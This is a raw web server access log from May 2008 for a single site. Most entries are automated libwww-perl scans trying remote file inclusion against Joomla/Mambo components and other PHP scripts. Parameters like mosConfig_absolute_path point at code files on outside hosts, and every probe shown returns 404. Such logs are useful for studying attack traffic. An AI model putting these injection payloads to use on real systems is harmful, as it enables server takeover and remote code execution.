202.67.13.218 - - [11/May/2008:19:07:19 -0700] "GET /logs/access_080128.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
202.67.13.218 - - [11/May/2008:19:07:20 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
202.67.13.218 - - [11/May/2008:19:07:21 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
72.30.216.102 - - [11/May/2008:19:09:16 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:10:37 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:10:37 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:10:38 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.114.137.165 - - [11/May/2008:19:10:47 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:19:11:25 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:19:11:25 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:19:11:25 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.62.115.202 - - [11/May/2008:19:13:03 -0700] "GET /logs/access.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:13:21 -0700] "GET /logs/access_080225.log//Neos_Chronos/header.php?base_folder=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.62.115.202 - - [11/May/2008:19:13:21 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
209.62.115.202 - - [11/May/2008:19:13:21 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:13:21 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.62.115.202 - - [11/May/2008:19:13:21 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:13:21 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.16.26.124 - - [11/May/2008:19:14:29 -0700] "GET /logs/access.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:14:30 -0700] "GET /logs/access_080225.log//citywriter/head.php?path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:14:31 -0700] "GET //citywriter/head.php?path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:14:31 -0700] "GET /logs//citywriter/head.php?path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.16.26.124 - - [11/May/2008:19:14:36 -0700] "GET /logs/access.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
193.178.228.12 - - [11/May/2008:19:14:49 -0700] "GET /logs/access.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:15:19 -0700] "GET /logs/access.log//citywriter/head.php?path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
216.118.117.79 - - [11/May/2008:19:15:48 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://haddembr.site88.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.toulouseangloexchange.com"
216.118.117.79 - - [11/May/2008:19:15:49 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://haddembr.site88.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.toulouseangloexchange.com"
67.205.67.241 - - [11/May/2008:19:15:54 -0700] "GET /main.php3?act=ftp://194.177.97.246/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.205.67.241 - - [11/May/2008:19:15:54 -0700] "GET /main.php3?act=ftp://194.177.97.246/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.83 - - [11/May/2008:19:17:37 -0700] "GET /logs/access.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:18:04 -0700] "GET /logs/access_080211.log//Neos_Chronos/header.php?base_folder=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:19:18:40 -0700] "GET /logs/access_080324.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:19:18:42 -0700] "GET //skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:19:18:44 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
67.205.67.241 - - [11/May/2008:19:20:13 -0700] "GET /homepage.php?sel=ftp://194.177.97.246/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.205.67.241 - - [11/May/2008:19:20:14 -0700] "GET /homepage.php?sel=ftp://194.177.97.246/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:22:15 -0700] "GET /logs/access_080225.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:22:15 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.184.206 - - [11/May/2008:19:22:16 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
208.82.181.6 - - [11/May/2008:19:25:48 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.arpel.org/ex/data.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
202.67.13.218 - - [11/May/2008:19:28:35 -0700] "GET /logs/access.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
189.24.245.102 - - [11/May/2008:19:29:58 -0700] "GET //config/dbutil.bck.php?confdir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
64.207.204.13 - - [11/May/2008:19:32:58 -0700] "GET /logs/access_080225.log//errors.php?error=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.207.204.13 - - [11/May/2008:19:32:58 -0700] "GET //errors.php?error=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.207.204.13 - - [11/May/2008:19:32:58 -0700] "GET /logs//errors.php?error=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:19:33:32 -0700] "GET /logs/access_080225.log//admin/business_inc/saveserver.php?thisdir=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:19:33:32 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:19:34:00 -0700] "GET /logs/access_080225.log//admin/business_inc/saveserver.php?thisdir=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:19:34:00 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
74.6.25.168 - - [11/May/2008:19:34:07 -0700] "GET /tmp/?S=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
208.116.44.60 - - [11/May/2008:19:34:15 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:19:34:26 -0700] "GET /logs/access_080225.log//admin/business_inc/saveserver.php?thisdir=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:19:34:26 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:19:35:20 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
67.205.67.241 - - [11/May/2008:19:35:36 -0700] "GET /logs/access_080211.log/main.php3?act=ftp://194.177.97.246/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.205.67.241 - - [11/May/2008:19:35:36 -0700] "GET /logs/access_080211.log/main.php3?act=ftp://194.177.97.246/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.205.67.241 - - [11/May/2008:19:35:36 -0700] "GET /logs/main.php3?act=ftp://194.177.97.246/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.205.67.241 - - [11/May/2008:19:35:36 -0700] "GET /logs/main.php3?act=ftp://194.177.97.246/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:19:35:50 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.34.226.62 - - [11/May/2008:19:36:10 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.114.137.165 - - [11/May/2008:19:37:06 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.207.204.13 - - [11/May/2008:19:39:18 -0700] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.207.204.13 - - [11/May/2008:19:39:19 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.207.204.13 - - [11/May/2008:19:39:19 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
189.24.245.102 - - [11/May/2008:19:39:34 -0700] "GET //citywriter/head.php?path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
208.116.44.60 - - [11/May/2008:19:40:51 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
85.114.137.165 - - [11/May/2008:19:40:52 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.137.165 - - [11/May/2008:19:40:52 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.137.165 - - [11/May/2008:19:40:53 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
195.155.232.37 - - [11/May/2008:19:41:02 -0700] "GET /logs/access_080225.log//errors.php?error=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.155.232.37 - - [11/May/2008:19:41:02 -0700] "GET //errors.php?error=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.155.232.37 - - [11/May/2008:19:41:03 -0700] "GET /logs//errors.php?error=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
193.34.150.208 - - [11/May/2008:19:43:11 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.toulouseangloexchange.com"
193.34.150.208 - - [11/May/2008:19:43:11 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.toulouseangloexchange.com"
64.207.204.13 - - [11/May/2008:19:46:30 -0700] "GET /logs/access_080225.log//components/com_simpleboard/file_upload.php?sbp=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
208.116.44.60 - - [11/May/2008:19:50:13 -0700] "GET /logs/access_080211.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
208.116.44.60 - - [11/May/2008:19:50:13 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
72.36.138.74 - - [11/May/2008:19:51:14 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://61.19.234.26/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
72.36.138.74 - - [11/May/2008:19:51:14 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://61.19.234.26/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
80.90.127.34 - - [11/May/2008:19:51:49 -0700] "GET //config/dbutil.bck.php?confdir=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.155.232.37 - - [11/May/2008:19:52:55 -0700] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.155.232.37 - - [11/May/2008:19:52:56 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.155.232.37 - - [11/May/2008:19:52:57 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
67.19.216.122 - - [11/May/2008:19:53:35 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://61.19.234.26/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
67.19.216.122 - - [11/May/2008:19:53:36 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://61.19.234.26/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
208.116.44.60 - - [11/May/2008:19:53:46 -0700] "GET /logs/access_080211.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
208.116.44.60 - - [11/May/2008:19:53:46 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
209.62.115.202 - - [11/May/2008:19:54:35 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
80.90.127.34 - - [11/May/2008:19:55:16 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.90.127.34 - - [11/May/2008:19:55:16 -0700] "GET //config/dbutil.bck.php?confdir=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.90.127.34 - - [11/May/2008:19:55:16 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:56:50 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:56:50 -0700] "GET //skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:56:50 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:56:50 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:56:50 -0700] "GET //skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:56:50 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:56:50 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:56:50 -0700] "GET //skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:56:50 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:57:02 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:57:02 -0700] "GET //skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:57:02 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:57:05 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:57:05 -0700] "GET //skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:57:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:57:11 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:57:11 -0700] "GET //skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:57:11 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.90.127.34 - - [11/May/2008:19:58:17 -0700] "GET //citywriter/head.php?path=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
200.250.121.2 - - [11/May/2008:19:59:07 -0700] "GET /logs/access_080324.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.drcrazy.de/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.250.121.2 - - [11/May/2008:19:59:08 -0700] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.drcrazy.de/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.250.121.2 - - [11/May/2008:19:59:09 -0700] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.drcrazy.de/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:59:35 -0700] "GET //skin/zero_vote/error.php?dir=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
